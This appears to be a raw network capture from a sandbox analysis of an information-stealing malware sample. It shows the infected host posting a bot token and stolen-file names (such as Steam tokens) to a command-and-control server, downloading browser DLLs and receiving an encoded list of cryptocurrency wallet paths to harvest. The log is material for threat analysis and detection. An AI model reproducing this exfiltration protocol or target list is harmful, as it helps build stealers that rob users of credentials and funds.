Aug 31, 2024 15:44:26.427417994 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:27.172521114 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="file"------CFHDBFIEGIDGIECBKJEC--
Aug 31, 2024 15:44:27.483078957 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:28.822582960 CEST	93	OUT	GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 31, 2024 15:44:29.068763018 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Aug 31, 2024 15:44:31.415097952 CEST	93	OUT	GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 31, 2024 15:44:31.659394979 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:31 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Aug 31, 2024 15:44:32.604007959 CEST	94	OUT	GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 31, 2024 15:44:32.848419905 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:32 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Aug 31, 2024 15:44:33.335724115 CEST	90	OUT	GET /f1ddeb6592c03206/nss3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 31, 2024 15:44:33.580002069 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:33 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Aug 31, 2024 15:44:35.159444094 CEST	94	OUT	GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 31, 2024 15:44:35.404886007 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Aug 31, 2024 15:44:35.587687969 CEST	98	OUT	GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 31, 2024 15:44:35.832617998 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Aug 31, 2024 15:44:36.681736946 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDG Host: 185.215.113.17 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Aug 31, 2024 15:44:37.177028894 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:37.235965967 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"wallets------JKECFCFBGDHIECAAFIID--
Aug 31, 2024 15:44:37.489353895 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:37 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Aug 31, 2024 15:44:37.492022038 CEST	466	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI Host: 185.215.113.17 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 2d 2d 0d 0a Data Ascii: ------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="message"files------IIECFHDBAAECAAKFHDHI--
Aug 31, 2024 15:44:37.739394903 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:37.758704901 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJ Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="file"------KKKJEHCGCGDAAAKFHJKJ--
Aug 31, 2024 15:44:38.057789087 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:38.091057062 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 2d 2d 0d 0a Data Ascii: ------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="message"ybncbhylepme------EHDGCGIDAKEBKECAFIEH--
Aug 31, 2024 15:44:38.395878077 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
